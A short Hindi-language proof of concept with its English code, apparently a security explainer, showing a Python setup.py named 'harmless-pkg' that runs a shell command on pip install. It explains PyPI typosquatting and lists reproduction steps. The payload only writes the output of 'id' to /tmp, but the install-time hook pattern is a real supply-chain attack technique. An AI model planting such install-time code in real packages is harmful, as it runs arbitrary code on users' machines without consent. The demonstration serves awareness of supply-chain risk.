
दर्शाता है कि कैसे एक दुर्भावनापूर्ण Python पैकेज pip install के दौरान setup.py के माध्यम से मनमाने कमांड निष्पादित करता है, जो PyPI सप्लाई चेन और typosquatting जोखिमों को उजागर करता है।
# setup.py - Malicious package that executes during install
from setuptools import setup
import os
# This runs on pip install
os.system('id > /tmp/pwned_by_package')
setup(
name='harmless-pkg',
version='1.0',
packages=[],
)
एक PyPI पैकेज अपने setup.py में मनमाना कोड शामिल कर सकता है, जो pip install के दौरान निष्पादित होता है। एक हमलावर किसी लोकप्रिय पैकेज के समान नाम वाला पैकेज प्रकाशित कर सकता है (typosquatting) और स्थापना पर, पेलोड उपयोगकर्ता के विशेषाधिकारों के साथ चलता है, जिससे रिमोट कोड निष्पादन होता है।
setup.py को बिना सैंडबॉक्सिंग के निष्पादित करता है, जिससे पैकेजों को पूर्ण पहुंच मिलती है।setup.py के साथ दुर्भावनापूर्ण पैकेज निर्देशिका बनाएँ।pip install ./harmless-pkg
cat /tmp/pwned_by_package
id कमांड निष्पादित किया गया।